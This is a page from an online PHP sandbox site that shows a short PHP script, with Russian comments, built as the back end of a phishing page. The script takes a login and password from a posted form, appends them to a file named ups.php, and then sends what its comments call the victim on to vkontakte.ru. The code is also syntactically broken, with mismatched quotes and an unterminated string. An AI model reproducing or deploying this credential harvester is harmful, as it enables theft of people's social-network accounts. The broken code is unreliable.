php - PHP Online

Form of PHP Sandbox

Enter Your PHP code here for testing/debugging in the Online PHP Sandbox. As in the usual PHP files, you can also add HTML, but do not forget to add the tag <?php in the places where the PHP script should be executed.



Your result can be seen below.

Result of php executing





Full code of php.php

  1. <?
  2. $Login = $_POST[‘zabor’]; 
  3. $Pass = $_POST[‘zena’]; 
  4. $log = fopen(‘ups.php’,’a+);
  5. fwrite($log,'<br> $Login:$Pass \n’);
  6. fclose($log); //закрывает ups.php
  7. echo ‘<html><head><META HTTP-EQUIV=’Refresh’ content =’0; URL=http://vkontakte.ru’></head></html>’; // перенаправляем жертву на http://vk.com
  8. ?>
  9.  
  10.  
  11.  
File Description
  • php
  • PHP Code
  • 17 Oct-2021
  • 364 Bytes
You can Share it: